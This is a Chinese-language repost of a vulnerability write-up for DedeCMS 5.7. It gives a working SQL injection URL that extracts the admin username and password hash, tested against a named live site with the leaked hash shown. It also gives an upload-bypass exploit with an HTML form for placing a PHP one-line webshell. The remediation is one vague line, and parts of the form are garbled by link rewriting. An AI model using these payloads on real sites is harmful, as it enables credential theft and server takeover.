网站地图    收藏   

主页 > 后端 > 网站安全 >

织梦5.7注入加上传漏洞及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 会员中心查询会员信息语句过滤不严,导致url可提交注入参数;会员中心有上传动作过滤不严,导致上传漏洞详细说明:①注入漏洞。这站http://www.XXX.com/首先访问/data/admin/ver.txt页面获取...

会员中心查询会员信息语句过滤不严,导致url可提交注入参数;
会员中心有上传动作过滤不严,导致上传漏洞
详细说明:
①注入漏洞。
这站http://www.XXX.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
然后写上语句
查看管理员帐号
http://www.xxx.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
 
admin www.2cto.com
 
查看管理员密码
 http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
 
8d29b1ef9f8c5a5af429
 
查看管理员密码
 
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
 
8d2
9b1ef9f8c5a5af42
9
 
cmd5没解出来 只好测试第二个方法
 
 
②上传漏洞:
 
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
 
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
 
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
 
<form action="=../dialog/select_soft_post]
 
<[/url">http:// www.2cto.com /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
 
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
 
即可上传成功
修复方案:
上述两处增加过滤

作者 神倦懒言

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论